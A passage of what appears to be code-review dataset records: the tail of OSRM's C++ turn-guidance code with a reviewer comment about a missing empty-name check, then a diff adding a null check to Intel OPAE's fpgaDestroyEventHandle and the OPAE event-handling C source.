(detail::requiresAnnouncement(in_data, out_data)) { if (low_priority_left && !low_priority_right) { left.instruction = {findBasicTurnType(via_edge, left), DirectionModifier::SlightLeft}; right.instruction = getInstructionForObvious(3, via_edge, false, right); } else { if (low_priority_right && !low_priority_left) { left.instruction = {findBasicTurnType(via_edge, left), DirectionModifier::SlightLeft}; right.instruction = {findBasicTurnType(via_edge, right), DirectionModifier::SlightRight}; } else { right.instruction = {TurnType::Fork, DirectionModifier::SlightRight}; left.instruction = {TurnType::Fork, DirectionModifier::SlightLeft}; } } } else { right.instruction = {TurnType::Suppressed, DirectionModifier::Straight}; left.instruction = {findBasicTurnType(via_edge, left), DirectionModifier::SlightLeft}; } } } // left side of fork if (low_priority_right && !low_priority_left) left.instruction = {TurnType::Suppressed, DirectionModifier::SlightLeft}; else { if (low_priority_left && !low_priority_right) left.instruction = {TurnType::Turn, DirectionModifier::SlightLeft}; else left.instruction = {TurnType::Fork, DirectionModifier::SlightLeft}; } // right side of fork if (low_priority_left && !low_priority_right) right.instruction = {TurnType::Suppressed, DirectionModifier::SlightLeft}; else { if (low_priority_right && !low_priority_left) right.instruction = {TurnType::Turn, DirectionModifier::SlightRight}; else right.instruction = {TurnType::Fork, DirectionModifier::SlightRight}; } } void IntersectionHandler::assignFork(const EdgeID via_edge, ConnectedRoad &left, ConnectedRoad &center, ConnectedRoad &right) const { // TODO handle low priority road classes in a reasonable way if (left.entry_allowed && center.entry_allowed && right.entry_allowed) { left.instruction = {TurnType::Fork, DirectionModifier::SlightLeft}; if (angularDeviation(center.angle, 180) < MAXIMAL_ALLOWED_NO_TURN_DEVIATION) { const auto &in_data = node_based_graph.GetEdgeData(via_edge); const auto &out_data = node_based_graph.GetEdgeData(center.eid); if (detail::requiresAnnouncement(in_data, out_data)) { center.instruction = {TurnType::Fork, DirectionModifier::Straight}; } else { center.instruction = {TurnType::Suppressed, DirectionModifier::Straight}; } } else { center.instruction = {TurnType::Fork, DirectionModifier::Straight}; } right.instruction = {TurnType::Fork, DirectionModifier::SlightRight}; } else if (left.entry_allowed) { if (right.entry_allowed) assignFork(via_edge, left, right); else if (center.entry_allowed) assignFork(via_edge, left, center); else left.instruction = {findBasicTurnType(via_edge, left), getTurnDirection(left.angle)}; } else if (right.entry_allowed) { if (center.entry_allowed) assignFork(via_edge, center, right); else right.instruction = {findBasicTurnType(via_edge, right), getTurnDirection(right.angle)}; } else { if (center.entry_allowed) center.instruction = {findBasicTurnType(via_edge, center), getTurnDirection(center.angle)}; } } void IntersectionHandler::assignTrivialTurns(const EdgeID via_eid, Intersection &intersection, const std::size_t begin, const std::size_t end) const { for (std::size_t index = begin; index != end; ++index) if (intersection[index].entry_allowed) intersection[index].instruction = {findBasicTurnType(via_eid, intersection[index]), getTurnDirection(intersection[index].angle)}; } bool IntersectionHandler::isThroughStreet(const std::size_t index, const Intersection &intersection) const { if (node_based_graph.GetEdgeData(intersection[index].eid).name_id == EMPTY_NAMEID) return false; const auto &data_at_index = node_based_graph.GetEdgeData(intersection[index].eid); // a through street cannot start at our own position -> index 1 for (std::size_t road_index = 1; road_index < intersection.size(); ++road_index) { if (road_index == index) continue; const auto &road = intersection[road_index]; const auto &road_data = node_based_graph.GetEdgeData(road.eid); // roads have a near straight angle (180 degree) const bool is_nearly_straight = angularDeviation(road.angle, intersection[index].angle) > (STRAIGHT_ANGLE - FUZZY_ANGLE_DIFFERENCE); const bool have_same_name = data_at_index.name_id == road_data.name_id; const bool have_same_category = data_at_index.road_classification == road_data.road_classification; if (is_nearly_straight && have_same_name && have_same_category) return true; } return false; } std::size_t IntersectionHandler::findObviousTurn(const EdgeID via_edge, const Intersection &intersection) const { // no obvious road if (intersection.size() == 1) return 0; // a single non u-turn is obvious if (intersection.size() == 2) return 1; // at least three roads std::size_t best = 0; double best_deviation = 180; std::size_t best_continue = 0; double best_continue_deviation = 180; const EdgeData &in_data = node_based_graph.GetEdgeData(via_edge); const auto in_classification = in_data.road_classification; for (std::size_t i = 1; i < intersection.size(); ++i) { const double deviation = angularDeviation(intersection[i].angle, STRAIGHT_ANGLE); if (!intersection[i].entry_allowed) continue; const auto out_data = node_based_graph.GetEdgeData(intersection[i].eid); const auto continue_class = node_based_graph.GetEdgeData(intersection[best_continue].eid).road_classification; if (out_data.name_id == in_data.name_id && (best_continue == 0 || (continue_class.GetPriority() > out_data.road_classification.GetPriority() && in_classification != continue_class) || (deviation < best_continue_deviation && out_data.road_classification == continue_class) || (continue_class != in_classification && out_data.road_classification == continue_class))) { best_continue_deviation = deviation; best_continue = i; } const auto current_best_class = node_based_graph.GetEdgeData(intersection[best_continue].eid).road_classification; // don't prefer low priority classes if (best != 0 && out_data.road_classification.IsLowPriorityRoadClass() && !current_best_class.IsLowPriorityRoadClass()) continue; const bool is_better_choice_by_priority = best == 0 || obviousByRoadClass(in_data.road_classification, out_data.road_classification, current_best_class); const bool other_is_better_choice_by_priority = best != 0 && obviousByRoadClass(in_data.road_classification, current_best_class, out_data.road_classification); if ((!other_is_better_choice_by_priority && deviation < best_deviation) || is_better_choice_by_priority) { best_deviation = deviation; best = i; } } // We don't consider empty names a valid continue feature. This distinguishes between missing // names and actual continuing roads. if (in_data.name_id == EMPTY_NAMEID) best_continue = 0; if (best == 0) return 0; const std::pair<std::int64_t, std::int64_t> num_continue_names = [&]() { std::int64_t count = 0, count_valid = 0; if (in_data.name_id != EMPTY_NAMEID) { for (std::size_t i = 1; i < intersection.size(); ++i) { const auto &road = intersection[i]; if ((in_data.name_id == node_based_graph.GetEdgeData(road.eid).name_id)) { ++count; if (road.entry_allowed) ++count_valid; } } } return std::make_pair(count, count_valid); }(); if (0 != best_continue && best != best_continue && angularDeviation(intersection[best].angle, STRAIGHT_ANGLE) < MAXIMAL_ALLOWED_NO_TURN_DEVIATION && node_based_graph.GetEdgeData(intersection[best_continue].eid).road_classification == node_based_graph.GetEdgeData(intersection[best].eid).road_classification) { // if the best angle is going straight but the road is turning, we don't name anything // obvious return 0; } const bool all_continues_are_narrow = [&]() { if (in_data.name_id == EMPTY_NAMEID) return false; return std::count_if( intersection.begin() + 1, intersection.end(), [&](const ConnectedRoad &road) { return (in_data.name_id == node_based_graph.GetEdgeData(road.eid).name_id) && angularDeviation(road.angle, STRAIGHT_ANGLE) < NARROW_TURN_ANGLE; }) == num_continue_names.first; }(); // has no obvious continued road const auto &best_data = node_based_graph.GetEdgeData(intersection[best].eid); const auto check_non_continue = [&]() { // no continue road exists if (best_continue == 0) return true; // we have multiple continues and not all are narrow (treat all the same) if (!all_continues_are_narrow && (num_continue_names.first >= 2 && intersection.size() >= 4)) return true; // if the best continue is not narrow and we also have at least 2 possible choices, the // intersection size does not matter anymore if (num_continue_names.second >= 2 && best_continue_deviation >= 2 * NARROW_TURN_ANGLE) return true; // continue data now most certainly exists const auto &continue_data = node_based_graph.GetEdgeData(intersection[best_continue].eid); if (obviousByRoadClass(in_data.road_classification, continue_data.road_classification, best_data.road_classification)) return false; if (obviousByRoadClass(in_data.road_classification, best_data.road_classification, continue_data.road_classification)) return true; // the best deviation is very straight and not a ramp if (best_deviation < best_continue_deviation && best_deviation < FUZZY_ANGLE_DIFFERENCE && !best_data.road_classification.IsRampClass()) return true; // the continue road is of a lower priority, while the road continues on the same priority // with a better angle if (best_deviation < best_continue_deviation && in_data.road_classification == best_data.road_classification && continue_data.road_classification.GetPriority() > best_data.road_classification.GetPriority()) return true; return false; }(); if (check_non_continue) { // Find left/right deviation // skipping over service roads const std::size_t left_index = [&]() { const auto index_candidate = (best + 1) % intersection.size(); if (index_candidate == 0) return index_candidate; const auto &candidate_data = node_based_graph.GetEdgeData(intersection[index_candidate].eid); if (obviousByRoadClass(in_data.road_classification, best_data.road_classification, candidate_data.road_classification)) return (index_candidate + 1) % intersection.size(); else return index_candidate; }(); const auto right_index = [&]() { BOOST_ASSERT(best > 0); const auto index_candidate = best - 1; if (index_candidate == 0) return index_candidate; const auto candidate_data = node_based_graph.GetEdgeData(intersection[index_candidate].eid); if (obviousByRoadClass(in_data.road_classification, best_data.road_classification, candidate_data.road_classification)) return index_candidate - 1; else return index_candidate; }(); const double left_deviation = angularDeviation(intersection[left_index].angle, STRAIGHT_ANGLE); const double right_deviation = angularDeviation(intersection[right_index].angle, STRAIGHT_ANGLE); if (best_deviation < MAXIMAL_ALLOWED_NO_TURN_DEVIATION && std::min(left_deviation, right_deviation) > FUZZY_ANGLE_DIFFERENCE) return best; const auto &left_data = node_based_graph.GetEdgeData(intersection[left_index].eid); const auto &right_data = node_based_graph.GetEdgeData(intersection[right_index].eid); const bool obvious_to_left = left_index == 0 || obviousByRoadClass(in_data.road_classification, best_data.road_classification, left_data.road_classification); const bool obvious_to_right = right_index == 0 || obviousByRoadClass(in_data.road_classification, best_data.road_classification, right_data.road_classification); // if the best turn isn't narrow, but there is a nearly straight turn, we don't consider the // turn obvious const auto check_narrow = [&intersection, best_deviation](const std::size_t index) { return angularDeviation(intersection[index].angle, STRAIGHT_ANGLE) <= FUZZY_ANGLE_DIFFERENCE && (best_deviation > NARROW_TURN_ANGLE || intersection[index].entry_allowed); }; // other narrow turns? if (check_narrow(right_index) && !obvious_to_right) return 0; if (check_narrow(left_index) && !obvious_to_left) return 0; // check if a turn is distinct enough const auto isDistinct = [&](const std::size_t index, const double deviation) { /* If the neighbor is not possible to enter, we allow for a lower distinction rate. If the road category is smaller, its also adjusted. Only roads of the same priority require the full distinction ratio. */ const auto adjusted_distinction_ratio = [&]() { // not allowed competitors are easily distinct if (!intersection[index].entry_allowed) return 0.7 * DISTINCTION_RATIO; // a bit less obvious are road classes else if (in_data.road_classification == best_data.road_classification && best_data.road_classification.GetPriority() < node_based_graph.GetEdgeData(intersection[index].eid) .road_classification.GetPriority()) return 0.8 * DISTINCTION_RATIO; // if road classes are the same, we use the full ratio else return DISTINCTION_RATIO; }(); return index == 0 || deviation / best_deviation >= adjusted_distinction_ratio || (deviation <= NARROW_TURN_ANGLE && !intersection[index].entry_allowed); }; const bool distinct_to_left = isDistinct(left_index, left_deviation); const bool distinct_to_right = isDistinct(right_index, right_deviation); // Well distinct turn that is nearly straight if ((distinct_to_left || obvious_to_left) && (distinct_to_right || obvious_to_right)) return best; } else { const double deviation = angularDeviation(intersection[best_continue].angle, STRAIGHT_ANGLE); const auto &continue_data = node_based_graph.GetEdgeData(intersection[best_continue].eid); if (std::abs(deviation) < 1) return best_continue; // check if any other similar best continues exist for (std::size_t i = 1; i < intersection.size(); ++i) { if (i == best_continue || !intersection[i].entry_allowed) continue; const auto &turn_data = node_based_graph.GetEdgeData(intersection[i].eid); const bool is_obvious_by_road_class = obviousByRoadClass(in_data.road_classification, continue_data.road_classification, turn_data.road_classification); // if the main road is obvious by class, we ignore the current road as a potential // prevention of obviousness if (is_obvious_by_road_class) continue; // continuation could be grouped with a straight turn and the turning road is a ramp if (turn_data.road_classification.IsRampClass() && deviation < GROUP_ANGLE) continue; // perfectly straight turns prevent obviousness const auto turn_deviation = angularDeviation(intersection[i].angle, STRAIGHT_ANGLE); if (turn_deviation < FUZZY_ANGLE_DIFFERENCE) return 0; const auto deviation_ratio = turn_deviation / deviation; // in comparison to normal devitions, a continue road can offer a smaller distinction // ratio. Other roads close to the turn angle are not as obvious, if one road continues. if (deviation_ratio < DISTINCTION_RATIO / 1.5) return 0; /* in comparison to another continuing road, we need a better distinction. This prevents situations where the turn is probably less obvious. An example are places that have a road with the same name entering/exiting: d / / a -- b \ \ c */ if (turn_data.name_id == continue_data.name_id && deviation_ratio < 1.5 * DISTINCTION_RATIO) return 0; } // Segregated intersections can result in us finding an obvious turn, even though its only // obvious due to a very short segment in between. So if the segment coming in is very // short, we check the previous intersection for other continues in the opposite bearing. const auto node_at_intersection = node_based_graph.GetTarget(via_edge); const util::Coordinate coordinate_at_intersection = node_info_list[node_at_intersection]; const auto node_at_u_turn = node_based_graph.GetTarget(intersection[0].eid); const util::Coordinate coordinate_at_u_turn = node_info_list[node_at_u_turn]; const double constexpr MAX_COLLAPSE_DISTANCE = 30; if (util::coordinate_calculation::haversineDistance( coordinate_at_intersection, coordinate_at_u_turn) < MAX_COLLAPSE_DISTANCE) { // this request here actually goes against the direction of the ingoing edgeid. This can // even reverse the direction. Since we don't want to compute actual turns but simply // try to find whether there is a turn going to the opposite direction of our obvious // turn, this should be alright. const auto previous_intersection = intersection_generator.GetActualNextIntersection( node_at_intersection, intersection[0].eid, nullptr, nullptr); const auto continue_road = intersection[best_continue]; for (const auto &comparison_road : previous_intersection) { // since we look at the intersection in the wrong direction, a similar angle // actually represents a near 180 degree different in bearings between the two // roads. So if there is a road that is enterable in the opposite direction just // prior, a turn is not obvious const auto &turn_data = node_based_graph.GetEdgeData(comparison_road.eid); if (angularDeviation(comparison_road.angle, STRAIGHT_ANGLE) > GROUP_ANGLE && angularDeviation(comparison_road.angle, continue_road.angle) < FUZZY_ANGLE_DIFFERENCE && !turn_data.reversed && continue_data.CanCombineWith(turn_data)) return 0; } } return best_continue; } return 0; } } // namespace guidance } // namespace extractor } // namespace osrm
1
17,831
the above check (by transitivity) checked for `in_data.name_id == out_data.name_id && in_data.name_id != EMPTY_NAME_ID && out_data.name_id != EMPTY_NAME_ID`. The final check of `out_data.name_id != EMPTY_NAME_ID` is missing now.
Project-OSRM-osrm-backend
cpp
@@ -583,6 +583,11 @@ out_free: fpga_result __FPGA_API__ fpgaDestroyEventHandle(fpga_event_handle *event_handle) { + //sanity check + if (!event_handle) { + return FPGA_INVALID_PARAM; + } + struct _fpga_event_handle *_eh = (struct _fpga_event_handle *) *event_handle; fpga_result result = FPGA_OK; int err = 0;
1
// Copyright(c) 2017, Intel Corporation // // Redistribution and use in source and binary forms, with or without // modification, are permitted provided that the following conditions are met: // // * Redistributions of source code must retain the above copyright notice, // this list of conditions and the following disclaimer. // * Redistributions in binary form must reproduce the above copyright notice, // this list of conditions and the following disclaimer in the documentation // and/or other materials provided with the distribution. // * Neither the name of Intel Corporation nor the names of its contributors // may be used to endorse or promote products derived from this software // without specific prior written permission. // // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" // AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE // IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE // ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE // LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR // CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF // SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS // INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN // CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) // ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE // POSSIBILITY OF SUCH DAMAGE. #ifdef HAVE_CONFIG_H #include <config.h> #endif // HAVE_CONFIG_H #include "common_int.h" #include <sys/socket.h> #include <sys/un.h> #include <sys/eventfd.h> #include <errno.h> #include "safe_string/safe_string.h" #include "opae/access.h" #include "opae/properties.h" #include "types_int.h" #include "intel-fpga.h" #define EVENT_SOCKET_NAME "/tmp/fpga_event_socket" #define EVENT_SOCKET_NAME_LEN 23 #define MAX_PATH_LEN 256 enum request_type { REGISTER_EVENT = 0, UNREGISTER_EVENT = 1 }; struct event_request { enum request_type type; fpga_event_type event; char device[MAX_PATH_LEN]; }; fpga_result send_event_request(int conn_socket, int fd, struct event_request *req) { struct msghdr mh; struct cmsghdr *cmh; struct iovec iov[1]; char buf[CMSG_SPACE(sizeof(int))]; ssize_t n; int *fd_ptr; /* set up ancillary data message header */ iov[0].iov_base = req; iov[0].iov_len = sizeof(*req); memset(buf, 0x0, sizeof(buf)); mh.msg_name = NULL; mh.msg_namelen = 0; mh.msg_iov = iov; mh.msg_iovlen = sizeof(iov) / sizeof(iov[0]); mh.msg_control = buf; mh.msg_controllen = CMSG_LEN(sizeof(int)); mh.msg_flags = 0; cmh = CMSG_FIRSTHDR(&mh); cmh->cmsg_len = CMSG_LEN(sizeof(int)); cmh->cmsg_level = SOL_SOCKET; cmh->cmsg_type = SCM_RIGHTS; fd_ptr = (int *)CMSG_DATA(cmh); *fd_ptr = fd; /* send ancillary data */ n = sendmsg(conn_socket, &mh, 0); if (n < 0) { FPGA_ERR("sendmsg failed: %s", strerror(errno)); return FPGA_EXCEPTION; } return FPGA_OK; } static fpga_result send_fme_event_request(fpga_handle handle, fpga_event_handle event_handle, int fme_operation) { int fd = FILE_DESCRIPTOR(event_handle); struct _fpga_handle *_handle = (struct _fpga_handle *)handle; struct fpga_fme_info fme_info = {.argsz = sizeof(fme_info), .flags = 0 }; struct fpga_fme_err_irq_set fme_irq = {.argsz = sizeof(fme_irq), .flags = 0}; if (fme_operation != FPGA_IRQ_ASSIGN && fme_operation != FPGA_IRQ_DEASSIGN) { FPGA_ERR("Invalid FME operation requested"); return FPGA_INVALID_PARAM; } if (ioctl(_handle->fddev, FPGA_FME_GET_INFO, &fme_info) != 0) { FPGA_ERR("Could not get FME info: %s", strerror(errno)); return FPGA_EXCEPTION; } /*capability field is set to 1 if the platform supports interrupts*/ if (fme_info.capability & FPGA_FME_CAP_ERR_IRQ) { if (fme_operation == FPGA_IRQ_ASSIGN) fme_irq.evtfd = fd; else fme_irq.evtfd = -1; if (ioctl(_handle->fddev, FPGA_FME_ERR_SET_IRQ, &fme_irq) != 0) { FPGA_ERR("Could not set eventfd %s", strerror(errno)); return FPGA_EXCEPTION; } } else { FPGA_ERR("FME interrupts not supported in hw"); return FPGA_EXCEPTION; } return FPGA_OK; } static fpga_result send_port_event_request(fpga_handle handle, fpga_event_handle event_handle, int port_operation) { int fd = FILE_DESCRIPTOR(event_handle); struct _fpga_handle *_handle = (struct _fpga_handle *)handle; struct fpga_port_info port_info = {.argsz = sizeof(port_info), .flags = 0 }; struct fpga_port_err_irq_set port_irq = {.argsz = sizeof(port_irq), .flags = 0}; if (port_operation != FPGA_IRQ_ASSIGN && port_operation != FPGA_IRQ_DEASSIGN) { FPGA_ERR("Invalid PORT operation requested"); return FPGA_INVALID_PARAM; } if (ioctl(_handle->fddev, FPGA_PORT_GET_INFO, &port_info) != 0) { FPGA_ERR("Could not get PORT info"); return FPGA_EXCEPTION; } /*capability field is set to 1 if the platform supports interrupts*/ if (port_info.capability & FPGA_PORT_CAP_ERR_IRQ) { if (port_operation == FPGA_IRQ_ASSIGN) port_irq.evtfd = fd; else port_irq.evtfd = -1; if (ioctl(_handle->fddev, FPGA_PORT_ERR_SET_IRQ, &port_irq) != 0) { FPGA_ERR("Could not set eventfd"); return FPGA_EXCEPTION; } } else { FPGA_ERR("PORT interrupts not supported in hw"); return FPGA_EXCEPTION; } return FPGA_OK; } static fpga_result send_uafu_event_request(fpga_handle handle, fpga_event_handle event_handle, uint32_t flags, int uafu_operation) { int fd = FILE_DESCRIPTOR(event_handle); struct _fpga_event_handle *_eh = (struct _fpga_event_handle *)event_handle; struct _fpga_handle *_handle = (struct _fpga_handle *)handle; struct fpga_port_info port_info = {.argsz = sizeof(port_info), .flags = 0 }; struct fpga_port_uafu_irq_set uafu_irq = {.argsz = sizeof(uafu_irq), .flags = 0}; if (uafu_operation != FPGA_IRQ_ASSIGN && uafu_operation != FPGA_IRQ_DEASSIGN) { FPGA_ERR("Invalid UAFU operation requested"); return FPGA_INVALID_PARAM; } if (ioctl(_handle->fddev, FPGA_PORT_GET_INFO, &port_info) != 0) { FPGA_ERR("Could not get PORT info"); return FPGA_EXCEPTION; } /*capability field is set to 1 if the platform supports interrupts*/ if (port_info.capability & FPGA_PORT_CAP_UAFU_IRQ) { if (flags >= port_info.num_uafu_irqs) { FPGA_ERR("Invalid User Interrupt vector id"); return FPGA_INVALID_PARAM; } if (uafu_operation == FPGA_IRQ_ASSIGN) { uafu_irq.evtfd[0] = fd; uafu_irq.start = flags; _eh->flags = flags; } else { uafu_irq.start = _eh->flags; uafu_irq.evtfd[0] = -1; } uafu_irq.count = 1; if (ioctl(_handle->fddev, FPGA_PORT_UAFU_SET_IRQ, &uafu_irq) != 0) { FPGA_ERR("Could not set eventfd"); return FPGA_EXCEPTION; } } else { FPGA_ERR("UAFU interrupts not supported in hw"); return FPGA_EXCEPTION; } return FPGA_OK; } static fpga_result get_handle_objtype(fpga_handle handle, fpga_objtype *objtype) { fpga_result res = FPGA_OK; fpga_result destroy_res = FPGA_OK; struct _fpga_handle *_handle = (struct _fpga_handle *)handle; struct _fpga_token *_token; fpga_properties prop = NULL; /*_handle->lock mutex is not locked since it will be locked by the calling functions*/ _token = (struct _fpga_token *)_handle->token; res = fpgaGetProperties(_token, &prop); if (res != FPGA_OK) { FPGA_MSG("Could not get FPGA properties"); return res; } res = fpgaPropertiesGetObjectType(prop, objtype); if (res != FPGA_OK) FPGA_MSG("Could not determine FPGA object type"); destroy_res = fpgaDestroyProperties(&prop); if (destroy_res != FPGA_OK) FPGA_MSG("Could not destroy FPGA properties"); return res; } static fpga_result check_interrupts_supported(fpga_handle handle) { fpga_result res = FPGA_OK; fpga_result destroy_res = FPGA_OK; struct _fpga_handle *_handle = (struct _fpga_handle *)handle; struct _fpga_token *_token; fpga_properties prop = NULL; fpga_objtype objtype; struct fpga_fme_info fme_info = {.argsz = sizeof(fme_info), .flags = 0 }; struct fpga_port_info port_info = {.argsz = sizeof(port_info), .flags = 0 }; /*_handle->lock mutex is not locked since it will be locked by the calling functions*/ _token = (struct _fpga_token *)_handle->token; res = fpgaGetProperties(_token, &prop); if (res != FPGA_OK) { FPGA_MSG("Could not get FPGA properties"); return res; } res = fpgaPropertiesGetObjectType(prop, &objtype); if (res != FPGA_OK) { FPGA_MSG("Could not determine FPGA object type"); goto destroy_prop; } if (objtype == FPGA_DEVICE) { if (ioctl(_handle->fddev, FPGA_FME_GET_INFO, &fme_info) != 0) { FPGA_ERR("Could not get FME info: %s", strerror(errno)); res = FPGA_EXCEPTION; goto destroy_prop; } if (fme_info.capability & FPGA_FME_CAP_ERR_IRQ) { res = FPGA_OK; } else { FPGA_ERR("Interrupts not supported in hw"); res = FPGA_NOT_SUPPORTED; } } else if (objtype == FPGA_ACCELERATOR) { if (ioctl(_handle->fddev, FPGA_PORT_GET_INFO, &port_info) != 0) { FPGA_ERR("Could not get PORT info: %s", strerror(errno)); res = FPGA_EXCEPTION; goto destroy_prop; } if (port_info.capability & FPGA_PORT_CAP_ERR_IRQ) { res = FPGA_OK; } else { FPGA_ERR("Interrupts not supported in hw"); res = FPGA_NOT_SUPPORTED; } } destroy_prop: destroy_res = fpgaDestroyProperties(&prop); if (destroy_res != FPGA_OK) { FPGA_MSG("Could not destroy FPGA properties"); return destroy_res; } return res; } static fpga_result driver_register_event(fpga_handle handle, fpga_event_type event_type, fpga_event_handle event_handle, uint32_t flags) { fpga_objtype objtype; fpga_result res = FPGA_OK; res = check_interrupts_supported(handle); if (res != FPGA_OK) { FPGA_ERR("Could not determine whether interrupts are supported"); return FPGA_NOT_SUPPORTED; } res = get_handle_objtype(handle, &objtype); if (res != FPGA_OK) { FPGA_MSG("Could not determine FPGA object type"); return res; } switch (event_type) { case FPGA_EVENT_ERROR: res = get_handle_objtype(handle, &objtype); if (res != FPGA_OK) { FPGA_MSG("Could not determine FPGA object type"); return res; } if (objtype == FPGA_DEVICE) { return send_fme_event_request(handle, event_handle, FPGA_IRQ_ASSIGN); } else if (objtype == FPGA_ACCELERATOR) { return send_port_event_request(handle, event_handle, FPGA_IRQ_ASSIGN); } case FPGA_EVENT_INTERRUPT: if (objtype != FPGA_ACCELERATOR) { FPGA_MSG("User events need an accelerator object"); return FPGA_INVALID_PARAM; } return send_uafu_event_request(handle, event_handle, flags, FPGA_IRQ_ASSIGN); case FPGA_EVENT_POWER_THERMAL: FPGA_MSG("Thermal interrupts not supported"); return FPGA_NOT_SUPPORTED; default: FPGA_ERR("Invalid event type"); return FPGA_EXCEPTION; } } static fpga_result driver_unregister_event(fpga_handle handle, fpga_event_type event_type, fpga_event_handle event_handle) { fpga_objtype objtype; fpga_result res = FPGA_OK; res = check_interrupts_supported(handle); if (res != FPGA_OK) { FPGA_ERR("Could not determine whether interrupts are supported"); return FPGA_NOT_SUPPORTED; } res = get_handle_objtype(handle, &objtype); if (res != FPGA_OK) { FPGA_ERR("Could not determine FPGA object type"); return res; } switch (event_type) { case FPGA_EVENT_ERROR: if (objtype == FPGA_DEVICE) { return send_fme_event_request(handle, event_handle, FPGA_IRQ_DEASSIGN); } else if (objtype == FPGA_ACCELERATOR) { return send_port_event_request(handle, event_handle, FPGA_IRQ_DEASSIGN); } case FPGA_EVENT_INTERRUPT: if (objtype != FPGA_ACCELERATOR) { FPGA_MSG("User events need an Accelerator object"); return FPGA_INVALID_PARAM; } return send_uafu_event_request(handle, event_handle, 0, FPGA_IRQ_DEASSIGN); case FPGA_EVENT_POWER_THERMAL: FPGA_MSG("Thermal interrupts not supported"); return FPGA_NOT_SUPPORTED; default: FPGA_ERR("Invalid event type"); return FPGA_EXCEPTION; } } static fpga_result daemon_register_event(fpga_handle handle, fpga_event_type event_type, fpga_event_handle event_handle, uint32_t flags) { int fd = FILE_DESCRIPTOR(event_handle); fpga_result result = FPGA_OK; struct sockaddr_un addr; struct event_request req; struct _fpga_handle *_handle = (struct _fpga_handle *)handle; struct _fpga_token *_token = (struct _fpga_token *)_handle->token; errno_t e; UNUSED_PARAM(flags); if (_handle->fdfpgad < 0) { /* connect to event socket */ _handle->fdfpgad = socket(AF_UNIX, SOCK_STREAM, 0); if (_handle->fdfpgad < 0) { FPGA_ERR("socket: %s", strerror(errno)); return FPGA_EXCEPTION; } addr.sun_family = AF_UNIX; e = strncpy_s(addr.sun_path, sizeof(addr.sun_path), EVENT_SOCKET_NAME, EVENT_SOCKET_NAME_LEN); if (EOK != e) { FPGA_ERR("strncpy_s failed"); return FPGA_EXCEPTION; } if (connect(_handle->fdfpgad, (struct sockaddr *)&addr, sizeof(addr)) < 0) { FPGA_DBG("connect: %s", strerror(errno)); result = FPGA_NO_DAEMON; goto out_close_conn; } } /* create event registration request */ req.type = REGISTER_EVENT; req.event = event_type; e = strncpy_s(req.device, sizeof(req.device), _token->sysfspath, sizeof(_token->sysfspath)); if (EOK != e) { FPGA_ERR("strncpy_s failed"); result = FPGA_EXCEPTION; goto out_close_conn; } req.device[sizeof(req.device)-1] = '\0'; /* send event packet */ result = send_event_request(_handle->fdfpgad, fd, &req); if (result != FPGA_OK) { FPGA_ERR("send_event_request failed"); goto out_close_conn; } return result; out_close_conn: close(_handle->fdfpgad); _handle->fdfpgad = -1; return result; } static fpga_result daemon_unregister_event(fpga_handle handle, fpga_event_type event_type) { fpga_result result = FPGA_OK; struct _fpga_handle *_handle = (struct _fpga_handle *)handle; struct _fpga_token *_token = (struct _fpga_token *)_handle->token; struct event_request req; ssize_t n; errno_t e; if (_handle->fdfpgad < 0) { FPGA_MSG("No fpgad connection"); return FPGA_INVALID_PARAM; } req.type = UNREGISTER_EVENT; req.event = event_type; e = strncpy_s(req.device, sizeof(req.device), _token->sysfspath, sizeof(_token->sysfspath)); if (EOK != e) { FPGA_ERR("strncpy_s failed"); result = FPGA_EXCEPTION; goto out_close_conn; } req.device[sizeof(req.device)-1] = '\0'; n = send(_handle->fdfpgad, &req, sizeof(req), 0); if (n < 0) { FPGA_ERR("send : %s", strerror(errno)); result = FPGA_EXCEPTION; goto out_close_conn; } return result; out_close_conn: close(_handle->fdfpgad); _handle->fdfpgad = -1; return result; } fpga_result __FPGA_API__ fpgaCreateEventHandle(fpga_event_handle *event_handle) { struct _fpga_event_handle *_eh; fpga_result result = FPGA_OK; pthread_mutexattr_t mattr; int err = 0; ASSERT_NOT_NULL(event_handle); _eh = malloc(sizeof(struct _fpga_event_handle)); if (NULL == _eh) { FPGA_ERR("Could not allocate memory for event handle"); return FPGA_NO_MEMORY; } _eh->magic = FPGA_EVENT_HANDLE_MAGIC; /* create eventfd */ _eh->fd = eventfd(0, 0); if (_eh->fd < 0) { FPGA_ERR("eventfd : %s", strerror(errno)); result = FPGA_EXCEPTION; goto out_free; } if (pthread_mutexattr_init(&mattr)) { FPGA_MSG("Failed to initialized event handle mutex attributes"); result = FPGA_EXCEPTION; goto out_free; } if (pthread_mutexattr_settype(&mattr, PTHREAD_MUTEX_RECURSIVE)) { FPGA_MSG("Failed to initialize event handle mutex attributes"); result = FPGA_EXCEPTION; goto out_attr_destroy; } if (pthread_mutex_init(&_eh->lock, &mattr)) { FPGA_MSG("Failed to initialize event handle mutex"); result = FPGA_EXCEPTION; goto out_attr_destroy; } pthread_mutexattr_destroy(&mattr); *event_handle = (fpga_event_handle)_eh; return FPGA_OK; out_attr_destroy: err = pthread_mutexattr_destroy(&mattr); if (err) FPGA_ERR("pthread_mutexatr_destroy() failed: %s", strerror(err)); out_free: free(_eh); return result; } fpga_result __FPGA_API__ fpgaDestroyEventHandle(fpga_event_handle *event_handle) { struct _fpga_event_handle *_eh = (struct _fpga_event_handle *) *event_handle; fpga_result result = FPGA_OK; int err = 0; result = event_handle_check_and_lock(_eh); if (result) return result; if (close(_eh->fd) < 0) { FPGA_ERR("eventfd : %s", strerror(errno)); err = pthread_mutex_unlock(&_eh->lock); if (err) FPGA_ERR("pthread_mutex_unlock() failed: %S", strerror(err)); if (errno == EBADF) return FPGA_INVALID_PARAM; else return FPGA_EXCEPTION; } _eh->magic = FPGA_INVALID_MAGIC; err = pthread_mutex_unlock(&_eh->lock); if 